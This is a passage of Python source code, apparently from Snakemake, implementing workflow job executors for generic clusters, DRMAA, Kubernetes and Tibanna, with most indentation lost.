target=copy_stdout, name="sidecar_stdout", args=(self, process)
)
thread_stdout.start()
thread_wait = threading.Thread(
target=wait, name="sidecar_stdout", args=(self, process)
)
thread_wait.start()
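    # Hedged sketch (not from the original source) of the sidecar contract used
    # above: the sidecar command must print one line of variables first
    # (captured into SNAKEMAKE_CLUSTER_SIDECAR_VARS and exported to the
    # submit/status/cancel commands), and may then keep running and logging:
    #
    #   #!/bin/bash
    #   echo "TOKEN=$(obtain-scheduler-token)"      # hypothetical helper
    #   while true; do refresh-scheduler-token; sleep 300; done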
def cancel(self):
def _chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i : i + n]
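        # For example, _chunks([1, 2, 3, 4, 5], 2) yields [1, 2], [3, 4], [5];
        # below, at most `cancelnargs` external job ids are passed per
        # cancel-command invocation.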
if self.cancelcmd: # We have --cluster-cancel
# Enumerate job IDs and create chunks. If cancelnargs evaluates to false (0/None)
# then pass all job ids at once
jobids = list(self.all_ext_jobids)
chunks = list(_chunks(jobids, self.cancelnargs or len(jobids)))
# Go through the chunks and cancel the jobs, warn in case of failures.
failures = 0
for chunk in chunks:
try:
cancel_timeout = 2 # rather fail on timeout than miss canceling all
env = dict(os.environ)
if self.sidecar_vars:
env["SNAKEMAKE_CLUSTER_SIDECAR_VARS"] = self.sidecar_vars
subprocess.check_call(
[self.cancelcmd] + chunk,
shell=False,
timeout=cancel_timeout,
env=env,
)
except subprocess.SubprocessError:
failures += 1
if failures:
logger.info(
(
"{} out of {} calls to --cluster-cancel failed. This is safe to "
"ignore in most cases."
).format(failures, len(chunks))
)
else:
logger.info(
"No --cluster-cancel given. Will exit after finishing currently running jobs."
)
self.shutdown()
def register_job(self, job):
# Do not register job here.
# Instead do it manually once the jobid is known.
pass
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
workdir = os.getcwd()
jobid = job.jobid
jobscript = self.get_jobscript(job)
jobfinished = os.path.join(self.tmpdir, "{}.jobfinished".format(jobid))
jobfailed = os.path.join(self.tmpdir, "{}.jobfailed".format(jobid))
self.write_jobscript(
job, jobscript, jobfinished=jobfinished, jobfailed=jobfailed
)
if self.statuscmd:
ext_jobid = self.dag.incomplete_external_jobid(job)
if ext_jobid:
# Job is incomplete and still running.
# We simply register it and wait for completion or failure.
logger.info(
"Resuming incomplete job {} with external jobid '{}'.".format(
jobid, ext_jobid
)
)
submit_callback(job)
with self.lock:
self.all_ext_jobids.append(ext_jobid)
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
return
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
try:
env = dict(os.environ)
if self.sidecar_vars:
env["SNAKEMAKE_CLUSTER_SIDECAR_VARS"] = self.sidecar_vars
# Remove SNAKEMAKE_PROFILE from environment as the snakemake call inside
# of the cluster job must run locally (or complains about missing -j).
env.pop("SNAKEMAKE_PROFILE", None)
ext_jobid = (
subprocess.check_output(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
env=env,
)
.decode()
.split("\n")
)
except subprocess.CalledProcessError as ex:
logger.error(
"Error submitting jobscript (exit code {}):\n{}".format(
ex.returncode, ex.output.decode()
)
)
error_callback(job)
return
if ext_jobid and ext_jobid[0]:
ext_jobid = ext_jobid[0]
self.external_jobid.update((f, ext_jobid) for f in job.output)
logger.info(
"Submitted {} {} with external jobid '{}'.".format(
"group job" if job.is_group() else "job", jobid, ext_jobid
)
)
self.workflow.persistence.started(job, external_jobid=ext_jobid)
submit_callback(job)
with self.lock:
self.all_ext_jobids.append(ext_jobid)
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
def _wait_for_jobs(self):
success = "success"
failed = "failed"
running = "running"
status_cmd_kills = []
if self.statuscmd is not None:
def job_status(job, valid_returns=["running", "success", "failed"]):
try:
# this command shall return "success", "failed" or "running"
env = dict(os.environ)
if self.sidecar_vars:
env["SNAKEMAKE_CLUSTER_SIDECAR_VARS"] = self.sidecar_vars
ret = subprocess.check_output(
"{statuscmd} '{jobid}'".format(
jobid=job.jobid, statuscmd=self.statuscmd
),
shell=True,
env=env,
).decode()
except subprocess.CalledProcessError as e:
if e.returncode < 0:
# Ignore SIGINT and all other issues due to signals
# because it will be caused by hitting e.g.
# Ctrl-C on the main process or sending killall to
# snakemake.
# Snakemake will handle the signal in
# the main process.
                        status_cmd_kills.append(-e.returncode)
                        if len(status_cmd_kills) > 10:
                            logger.info(
                                "Cluster status command {} was killed >10 times with signal(s) {} "
                                "(if this happens unexpectedly during your workflow execution, "
                                "have a closer look).".format(
                                    self.statuscmd,
                                    ",".join(str(s) for s in status_cmd_kills),
                                )
                            )
                            status_cmd_kills.clear()
                        # The status is unknown this round; report the job as
                        # still running and check again on the next poll.
                        return running
else:
raise WorkflowError(
"Failed to obtain job status. "
"See above for error message."
)
ret = ret.strip().split("\n")
if len(ret) != 1 or ret[0] not in valid_returns:
raise WorkflowError(
"Cluster status command {} returned {} but just a single line with one of {} is expected.".format(
self.statuscmd, "\\n".join(ret), ",".join(valid_returns)
)
)
return ret[0]
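            # A minimal sketch (an assumption, not part of this file) of a
            # cluster status script satisfying the contract checked above: it
            # receives the external job id and must print exactly one of
            # "running", "success" or "failed". For Slurm, roughly:
            #
            #   #!/usr/bin/env python3
            #   import subprocess, sys
            #   state = subprocess.run(
            #       ["sacct", "-j", sys.argv[1], "-X", "--noheader", "--format=State"],
            #       capture_output=True, text=True,
            #   ).stdout.split()
            #   if state and state[0] == "COMPLETED":
            #       print("success")
            #   elif state and state[0] in ("FAILED", "CANCELLED", "TIMEOUT", "OUT_OF_MEMORY"):
            #       print("failed")
            #   else:
            #       print("running")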
else:
def job_status(job):
if os.path.exists(active_job.jobfinished):
os.remove(active_job.jobfinished)
os.remove(active_job.jobscript)
return success
if os.path.exists(active_job.jobfailed):
os.remove(active_job.jobfailed)
os.remove(active_job.jobscript)
return failed
return running
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
# logger.debug("Checking status of {} jobs.".format(len(active_jobs)))
for active_job in active_jobs:
with self.status_rate_limiter:
status = job_status(active_job)
if status == success:
active_job.callback(active_job.job)
elif status == failed:
self.print_job_error(
active_job.job,
cluster_jobid=active_job.jobid
if active_job.jobid
else "unknown",
)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
else:
still_running.append(active_job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
SynchronousClusterJob = namedtuple(
"SynchronousClusterJob", "job jobid callback error_callback jobscript process"
)
class SynchronousClusterExecutor(ClusterExecutor):
"""
invocations like "qsub -sync y" (SGE) or "bsub -K" (LSF) are
synchronous, blocking the foreground thread and returning the
remote exit code at remote exit.
"""
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
restart_times=0,
assume_shared_fs=True,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=10,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.submitcmd = submitcmd
self.external_jobid = dict()
def cancel(self):
logger.info("Will exit after finishing currently running jobs.")
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
workdir = os.getcwd()
jobid = job.jobid
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
process = subprocess.Popen(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
)
submit_callback(job)
with self.lock:
self.active_jobs.append(
SynchronousClusterJob(
job, process.pid, callback, error_callback, jobscript, process
)
)
def _wait_for_jobs(self):
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
exitcode = active_job.process.poll()
if exitcode is None:
# job not yet finished
still_running.append(active_job)
elif exitcode == 0:
# job finished successfully
os.remove(active_job.jobscript)
active_job.callback(active_job.job)
else:
# job failed
os.remove(active_job.jobscript)
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
DRMAAClusterJob = namedtuple(
"DRMAAClusterJob", "job jobid callback error_callback jobscript"
)
class DRMAAExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
drmaa_args="",
drmaa_log_dir=None,
cluster_config=None,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
try:
import drmaa
except ImportError:
raise WorkflowError(
"Python support for DRMAA is not installed. "
"Please install it, e.g. with easy_install3 --user drmaa"
)
except RuntimeError as e:
raise WorkflowError("Error loading drmaa support:\n{}".format(e))
self.session = drmaa.Session()
self.drmaa_args = drmaa_args
self.drmaa_log_dir = drmaa_log_dir
self.session.initialize()
self.submitted = list()
def cancel(self):
from drmaa.const import JobControlAction
from drmaa.errors import InvalidJobException, InternalException
for jobid in self.submitted:
try:
self.session.control(jobid, JobControlAction.TERMINATE)
except (InvalidJobException, InternalException):
# This is common - logging a warning would probably confuse the user.
pass
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
try:
drmaa_args = job.format_wildcards(
self.drmaa_args, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule)
import drmaa
if self.drmaa_log_dir:
makedirs(self.drmaa_log_dir)
try:
jt = self.session.createJobTemplate()
jt.remoteCommand = jobscript
jt.nativeSpecification = drmaa_args
if self.drmaa_log_dir:
jt.outputPath = ":" + self.drmaa_log_dir
jt.errorPath = ":" + self.drmaa_log_dir
jt.jobName = os.path.basename(jobscript)
jobid = self.session.runJob(jt)
except (
drmaa.DeniedByDrmException,
drmaa.InternalException,
drmaa.InvalidAttributeValueException,
) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)), self.workflow.linemaps
)
error_callback(job)
return
logger.info(
"Submitted DRMAA job {} with external jobid {}.".format(job.jobid, jobid)
)
self.submitted.append(jobid)
self.session.deleteJobTemplate(jt)
submit_callback(job)
with self.lock:
self.active_jobs.append(
DRMAAClusterJob(job, jobid, callback, error_callback, jobscript)
)
def shutdown(self):
super().shutdown()
self.session.exit()
def _wait_for_jobs(self):
import drmaa
suspended_msg = set()
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
try:
retval = self.session.jobStatus(active_job.jobid)
except drmaa.ExitTimeoutException as e:
# job still active
still_running.append(active_job)
continue
except (drmaa.InternalException, Exception) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)),
self.workflow.linemaps,
)
os.remove(active_job.jobscript)
active_job.error_callback(active_job.job)
continue
if retval == drmaa.JobState.DONE:
os.remove(active_job.jobscript)
active_job.callback(active_job.job)
elif retval == drmaa.JobState.FAILED:
os.remove(active_job.jobscript)
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
else:
# still running
still_running.append(active_job)
def handle_suspended(by):
if active_job.job.jobid not in suspended_msg:
logger.warning(
"Job {} (DRMAA id: {}) was suspended by {}.".format(
active_job.job.jobid, active_job.jobid, by
)
)
suspended_msg.add(active_job.job.jobid)
if retval == drmaa.JobState.USER_SUSPENDED:
handle_suspended("user")
elif retval == drmaa.JobState.SYSTEM_SUSPENDED:
handle_suspended("system")
else:
try:
suspended_msg.remove(active_job.job.jobid)
except KeyError:
# there was nothing to remove
pass
with self.lock:
self.active_jobs.extend(still_running)
sleep()
@contextlib.contextmanager
def change_working_directory(directory=None):
"""Change working directory in execution context if provided."""
if directory:
try:
saved_directory = os.getcwd()
logger.info("Changing to shadow directory: {}".format(directory))
os.chdir(directory)
yield
finally:
os.chdir(saved_directory)
else:
yield
KubernetesJob = namedtuple(
"KubernetesJob", "job jobid callback error_callback kubejob jobscript"
)
class KubernetesExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
namespace,
container_image=None,
jobname="{rulename}.{jobid}",
printreason=False,
quiet=False,
printshellcmds=False,
cluster_config=None,
local_input=None,
restart_times=None,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
exec_job = (
"cp -rf /source/. . && "
"snakemake {target} --snakefile {snakefile} "
"--force --cores {cores} --keep-target-files --keep-remote "
"--latency-wait {latency_wait} --scheduler {workflow.scheduler_type} "
" --attempt {attempt} {use_threads} --max-inventory-time 0 "
"--wrapper-prefix {workflow.wrapper_prefix} "
"{overwrite_config} {printshellcmds} {rules} --nocolor "
"--notemp --no-hooks --nolock "
)
super().__init__(
workflow,
dag,
None,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
cluster_config=cluster_config,
local_input=local_input,
restart_times=restart_times,
exec_job=exec_job,
assume_shared_fs=False,
max_status_checks_per_second=10,
)
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.main_snakefile)
try:
from kubernetes import config
except ImportError:
raise WorkflowError(
"The Python 3 package 'kubernetes' "
"must be installed to use Kubernetes"
)
config.load_kube_config()
import kubernetes.client
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
self.namespace = namespace
self.envvars = workflow.envvars
self.secret_files = {}
self.run_namespace = str(uuid.uuid4())
self.secret_envvars = {}
self.register_secret()
self.container_image = container_image or get_container_image()
logger.info(f"Using {self.container_image} for Kubernetes jobs.")
def register_secret(self):
import kubernetes.client
secret = kubernetes.client.V1Secret()
secret.metadata = kubernetes.client.V1ObjectMeta()
# create a random uuid
secret.metadata.name = self.run_namespace
secret.type = "Opaque"
secret.data = {}
for i, f in enumerate(self.workflow.get_sources()):
if f.startswith(".."):
logger.warning(
"Ignoring source file {}. Only files relative "
"to the working directory are allowed.".format(f)
)
continue
# The kubernetes API can't create secret files larger than 1MB.
source_file_size = os.path.getsize(f)
max_file_size = 1048576
if source_file_size > max_file_size:
logger.warning(
"Skipping the source file {f}. Its size {source_file_size} exceeds "
"the maximum file size (1MB) that can be passed "
"from host to kubernetes.".format(
f=f, source_file_size=source_file_size
)
)
continue
with open(f, "br") as content:
key = "f{}".format(i)
                # Some files are smaller than 1MB but grow beyond that limit once
                # base64 encoded; exclude those as well, otherwise the Kubernetes API will complain.
encoded_contents = base64.b64encode(content.read()).decode()
encoded_size = len(encoded_contents)
if encoded_size > 1048576:
logger.warning(
"Skipping the source file {f} for secret key {key}. "
"Its base64 encoded size {encoded_size} exceeds "
"the maximum file size (1MB) that can be passed "
"from host to kubernetes.".format(
f=f,
source_file_size=source_file_size,
key=key,
encoded_size=encoded_size,
)
)
continue
self.secret_files[key] = f
secret.data[key] = encoded_contents
for e in self.envvars:
try:
key = e.lower()
secret.data[key] = base64.b64encode(os.environ[e].encode()).decode()
self.secret_envvars[key] = e
except KeyError:
continue
        # Check whether the total size of the secret data exceeds the 1MB limit
config_map_size = sum(
[len(base64.b64decode(v)) for k, v in secret.data.items()]
)
if config_map_size > 1048576:
logger.warning(
"The total size of the included files and other Kubernetes secrets "
"is {}, exceeding the 1MB limit.\n".format(config_map_size)
)
logger.warning(
"The following are the largest files. Consider removing some of them "
"(you need remove at least {} bytes):".format(config_map_size - 1048576)
)
entry_sizes = {
self.secret_files[k]: len(base64.b64decode(v))
for k, v in secret.data.items()
if k in self.secret_files
}
for k, v in sorted(entry_sizes.items(), key=lambda item: item[1])[:-6:-1]:
logger.warning(" * File: {k}, original size: {v}".format(k=k, v=v))
raise WorkflowError("ConfigMap too large")
self.kubeapi.create_namespaced_secret(self.namespace, secret)
def unregister_secret(self):
import kubernetes.client
safe_delete_secret = lambda: self.kubeapi.delete_namespaced_secret(
self.run_namespace, self.namespace, body=kubernetes.client.V1DeleteOptions()
)
self._kubernetes_retry(safe_delete_secret)
    # In rare cases, deleting a pod may raise a 404 NotFound error.
def safe_delete_pod(self, jobid, ignore_not_found=True):
import kubernetes.client
body = kubernetes.client.V1DeleteOptions()
try:
self.kubeapi.delete_namespaced_pod(jobid, self.namespace, body=body)
except kubernetes.client.rest.ApiException as e:
if e.status == 404 and ignore_not_found:
# Can't find the pod. Maybe it's already been
# destroyed. Proceed with a warning message.
logger.warning(
"[WARNING] 404 not found when trying to delete the pod: {jobid}\n"
"[WARNING] Ignore this error\n".format(jobid=jobid)
)
else:
raise e
def shutdown(self):
self.unregister_secret()
super().shutdown()
def cancel(self):
import kubernetes.client
body = kubernetes.client.V1DeleteOptions()
with self.lock:
for j in self.active_jobs:
func = lambda: self.safe_delete_pod(j.jobid, ignore_not_found=True)
self._kubernetes_retry(func)
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
import kubernetes.client
super()._run(job)
exec_job = self.format_job(
self.exec_job,
job,
_quote_all=True,
use_threads="--force-use-threads" if not job.is_group() else "",
)
        # Kubernetes silently does not submit a job if the name is too long;
        # therefore, we ensure that it is not longer than snakejob + a uuid.
jobid = "snakejob-{}".format(
get_uuid("{}-{}-{}".format(self.run_namespace, job.jobid, job.attempt))
)
body = kubernetes.client.V1Pod()
body.metadata = kubernetes.client.V1ObjectMeta(labels={"app": "snakemake"})
body.metadata.name = jobid
# container
container = kubernetes.client.V1Container(name=jobid)
container.image = self.container_image
container.command = shlex.split("/bin/sh")
container.args = ["-c", exec_job]
container.working_dir = "/workdir"
        container.volume_mounts = [
            kubernetes.client.V1VolumeMount(name="workdir", mount_path="/workdir"),
            kubernetes.client.V1VolumeMount(name="source", mount_path="/source"),
        ]
node_selector = {}
if "machine_type" in job.resources.keys():
# Kubernetes labels a node by its instance type using this node_label.
node_selector["node.kubernetes.io/instance-type"] = job.resources[
"machine_type"
]
body.spec = kubernetes.client.V1PodSpec(
containers=[container], node_selector=node_selector
)
# fail on first error
body.spec.restart_policy = "Never"
# source files as a secret volume
# we copy these files to the workdir before executing Snakemake
too_large = [
path
for path in self.secret_files.values()
if os.path.getsize(path) > 1000000
]
if too_large:
raise WorkflowError(
"The following source files exceed the maximum "
"file size (1MB) that can be passed from host to "
"kubernetes. These are likely not source code "
"files. Consider adding them to your "
"remote storage instead or (if software) use "
"Conda packages or container images:\n{}".format("\n".join(too_large))
)
secret_volume = kubernetes.client.V1Volume(name="source")
secret_volume.secret = kubernetes.client.V1SecretVolumeSource()
secret_volume.secret.secret_name = self.run_namespace
secret_volume.secret.items = [
kubernetes.client.V1KeyToPath(key=key, path=path)
for key, path in self.secret_files.items()
]
# workdir as an emptyDir volume of undefined size
workdir_volume = kubernetes.client.V1Volume(name="workdir")
workdir_volume.empty_dir = kubernetes.client.V1EmptyDirVolumeSource()
body.spec.volumes = [secret_volume, workdir_volume]
# env vars
container.env = []
for key, e in self.secret_envvars.items():
envvar = kubernetes.client.V1EnvVar(name=e)
envvar.value_from = kubernetes.client.V1EnvVarSource()
envvar.value_from.secret_key_ref = kubernetes.client.V1SecretKeySelector(
key=key, name=self.run_namespace
)
container.env.append(envvar)
# request resources
container.resources = kubernetes.client.V1ResourceRequirements()
container.resources.requests = {}
container.resources.requests["cpu"] = job.resources["_cores"]
if "mem_mb" in job.resources.keys():
container.resources.requests["memory"] = "{}M".format(
job.resources["mem_mb"]
)
# capabilities
if job.needs_singularity and self.workflow.use_singularity:
# TODO this should work, but it doesn't currently because of
# missing loop devices
# singularity inside docker requires SYS_ADMIN capabilities
# see https://groups.google.com/a/lbl.gov/forum/#!topic/singularity/e9mlDuzKowc
# container.capabilities = kubernetes.client.V1Capabilities()
# container.capabilities.add = ["SYS_ADMIN",
# "DAC_OVERRIDE",
# "SETUID",
# "SETGID",
# "SYS_CHROOT"]
# Running in privileged mode always works
container.security_context = kubernetes.client.V1SecurityContext(
privileged=True
)
pod = self._kubernetes_retry(
lambda: self.kubeapi.create_namespaced_pod(self.namespace, body)
)
logger.info(
"Get status with:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}".format(jobid=jobid)
)
self.active_jobs.append(
KubernetesJob(job, jobid, callback, error_callback, pod, None)
)
# Sometimes, certain k8s requests throw kubernetes.client.rest.ApiException
# Solving this issue requires reauthentication, as _kubernetes_retry shows
# However, reauthentication itself, under rare conditions, may also throw
# errors such as:
# kubernetes.client.exceptions.ApiException: (409), Reason: Conflict
#
# This error does not indicate a problem with the k8s cluster itself, and users
# can safely ignore it.
def _reauthenticate_and_retry(self, func=None):
import kubernetes
# Unauthorized.
# Reload config in order to ensure token is
# refreshed. Then try again.
logger.info("Trying to reauthenticate")
kubernetes.config.load_kube_config()
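# The kubectl call below is presumably a workaround that forces the kubeconfig
# credential plugin to refresh its token on disk before the client objects are
# recreated (assumption; the command's output is not used).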
subprocess.run(["kubectl", "get", "nodes"])
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
try:
self.register_secret()
except kubernetes.client.rest.ApiException as e:
if e.status == 409 and e.reason == "Conflict":
logger.warning("409 conflict ApiException when registering secrets")
logger.warning(e)
else:
raise WorkflowError(
e,
"This is likely a bug in "
"https://github.com/kubernetes-client/python.",
)
if func:
return func()
def _kubernetes_retry(self, func):
import kubernetes
import urllib3
with self.lock:
try:
return func()
except kubernetes.client.rest.ApiException as e:
if e.status == 401:
# Unauthorized.
# Reload config in order to ensure token is
# refreshed. Then try again.
return self._reauthenticate_and_retry(func)
# Handling timeout that may occur in case of GKE master upgrade
except urllib3.exceptions.MaxRetryError as e:
logger.info(
    "Request timed out! "
    "Check your connection to the Kubernetes master. "
    "The workflow will pause for 5 minutes to allow any update operations to complete."
)
time.sleep(300)
try:
return func()
except:
# Still can't reach the server after 5 minutes
raise WorkflowError(
e,
"Error 111 connection timeout, please check"
" that the k8 cluster master is reachable!",
)
def _wait_for_jobs(self):
import kubernetes
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
with self.status_rate_limiter:
logger.debug("Checking status for pod {}".format(j.jobid))
job_not_found = False
try:
res = self._kubernetes_retry(
lambda: self.kubeapi.read_namespaced_pod_status(
j.jobid, self.namespace
)
)
except kubernetes.client.rest.ApiException as e:
if e.status == 404:
# Jobid not found
# The job is likely already done and was deleted on
# the server.
j.callback(j.job)
continue
except WorkflowError as e:
print_exception(e, self.workflow.linemaps)
j.error_callback(j.job)
continue
if res is None:
msg = (
"Unknown pod {jobid}. "
"Has the pod been deleted "
"manually?"
).format(jobid=j.jobid)
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Failed":
msg = (
"For details, please issue:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}"
).format(jobid=j.jobid)
# failed
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Succeeded":
# finished
j.callback(j.job)
func = lambda: self.safe_delete_pod(
j.jobid, ignore_not_found=True
)
self._kubernetes_retry(func)
else:
# still active
still_running.append(j)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
TibannaJob = namedtuple(
"TibannaJob", "job jobname jobid exec_arn callback error_callback"
)
class TibannaExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
tibanna_sfn,
precommand="",
tibanna_config=False,
container_image=None,
printreason=False,
quiet=False,
printshellcmds=False,
local_input=None,
restart_times=None,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
self.workflow_sources = []
for wfs in workflow.get_sources():
if os.path.isdir(wfs):
for (dirpath, dirnames, filenames) in os.walk(wfs):
self.workflow_sources.extend(
[os.path.join(dirpath, f) for f in filenames]
)
else:
self.workflow_sources.append(os.path.abspath(wfs))
log = "sources="
for f in self.workflow_sources:
log += f
logger.debug(log)
self.snakefile = workflow.main_snakefile
self.envvars = {e: os.environ[e] for e in workflow.envvars}
if self.envvars:
logger.debug("envvars = %s" % str(self.envvars))
self.tibanna_sfn = tibanna_sfn
if precommand:
self.precommand = precommand
else:
self.precommand = ""
self.s3_bucket = workflow.default_remote_prefix.split("/")[0]
self.s3_subdir = re.sub(
"^{}/".format(self.s3_bucket), "", workflow.default_remote_prefix
)
logger.debug("precommand= " + self.precommand)
logger.debug("bucket=" + self.s3_bucket)
logger.debug("subdir=" + self.s3_subdir)
self.quiet = quiet
exec_job = (
"snakemake {target} --snakefile {snakefile} "
"--force --cores {cores} --keep-target-files --keep-remote "
"--latency-wait 0 --scheduler {workflow.scheduler_type} "
"--attempt 1 {use_threads} --max-inventory-time 0 "
"{overwrite_config} {rules} --nocolor "
"--notemp --no-hooks --nolock "
)
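# The placeholders in this template ({target}, {snakefile}, {cores},
# {use_threads}, ...) are filled in per job by add_command() via
# format_job_pattern() before the command is handed to Tibanna.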
super().__init__(
workflow,
dag,
cores,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
local_input=local_input,
restart_times=restart_times,
exec_job=exec_job,
assume_shared_fs=False,
max_status_checks_per_second=max_status_checks_per_second,
disable_default_remote_provider_args=True,
disable_get_default_resources_args=True,
)
self.container_image = container_image or get_container_image()
logger.info(f"Using {self.container_image} for Tibanna jobs.")
self.tibanna_config = tibanna_config
def shutdown(self):
# perform additional steps on shutdown if necessary
logger.debug("shutting down Tibanna executor")
super().shutdown()
def cancel(self):
from tibanna.core import API
for j in self.active_jobs:
logger.info("killing job {}".format(j.jobname))
while True:
try:
res = API().kill(j.exec_arn)
if not self.quiet:
print(res)
break
except KeyboardInterrupt:
pass
self.shutdown()
def split_filename(self, filename, checkdir=None):
f = os.path.abspath(filename)
if checkdir:
checkdir = checkdir.rstrip("/")
if f.startswith(checkdir):
fname = re.sub("^{}/".format(checkdir), "", f)
fdir = checkdir
else:
direrrmsg = (
"All source files including Snakefile, "
+ "conda env files, and rule script files "
+ "must be in the same working directory: {} vs {}"
)
raise WorkflowError(direrrmsg.format(checkdir, f))
else:
fdir, fname = os.path.split(f)
return fname, fdir
def remove_prefix(self, s):
return re.sub("^{}/{}/".format(self.s3_bucket, self.s3_subdir), "", s)
def handle_remote(self, target):
if isinstance(target, _IOFile) and target.remote_object.provider.is_default:
return self.remove_prefix(target)
else:
return target
def add_command(self, job, tibanna_args, tibanna_config):
# snakefile, with file name remapped
snakefile_fname = tibanna_args.snakemake_main_filename
# targets, with file name remapped
targets = job.get_targets()
if not isinstance(targets, list):
targets = [targets]
targets_default = " ".join([self.handle_remote(t) for t in targets])
# use_threads
use_threads = "--force-use-threads" if not job.is_group() else ""
# format command
command = self.format_job_pattern(
self.exec_job,
job,
target=targets_default,
snakefile=snakefile_fname,
use_threads=use_threads,
cores=tibanna_config["cpu"],
)
if self.precommand:
command = self.precommand + "; " + command
logger.debug("command = " + str(command))
tibanna_args.command = command
def add_workflow_files(self, job, tibanna_args):
snakefile_fname, snakemake_dir = self.split_filename(self.snakefile)
snakemake_child_fnames = []
for src in self.workflow_sources:
src_fname, _ = self.split_filename(src, snakemake_dir)
if src_fname != snakefile_fname: # redundant
snakemake_child_fnames.append(src_fname)
# change path for config files
self.workflow.overwrite_configfiles = [
self.split_filename(cf, snakemake_dir)[0]
for cf in self.workflow.overwrite_configfiles
]
tibanna_args.snakemake_directory_local = snakemake_dir
tibanna_args.snakemake_main_filename = snakefile_fname
tibanna_args.snakemake_child_filenames = list(set(snakemake_child_fnames))
def adjust_filepath(self, f):
if not hasattr(f, "remote_object"):
rel = self.remove_prefix(f) # log/benchmark
elif (
hasattr(f.remote_object, "provider") and f.remote_object.provider.is_default
):
rel = self.remove_prefix(f)
else:
rel = f
return rel
def make_tibanna_input(self, job):
from tibanna import ec2_utils, core as tibanna_core
# input & output
# The local snakemake command here must be run with --default-remote-prefix
# and --default-remote-provider (forced), but on the VM these options will be removed.
# The snakemake run on the VM will therefore treat these inputs and outputs as not remote.
# The files are transferred to the container by Tibanna before running snakemake.
# In short, the paths on the VM must be consistent with what's in the Snakefile,
# but the actual location of the files is on the S3 bucket/prefix.
# This mapping info must be passed to Tibanna.
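# For illustration (hypothetical names): with default_remote_prefix
# "mybucket/run1", a local output "results/out.txt" is registered below as
#   "file:///data1/snakemake/results/out.txt" -> "s3://mybucket/run1/results/out.txt"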
for i in job.input:
logger.debug("job input " + str(i))
logger.debug("job input is remote= " + ("true" if i.is_remote else "false"))
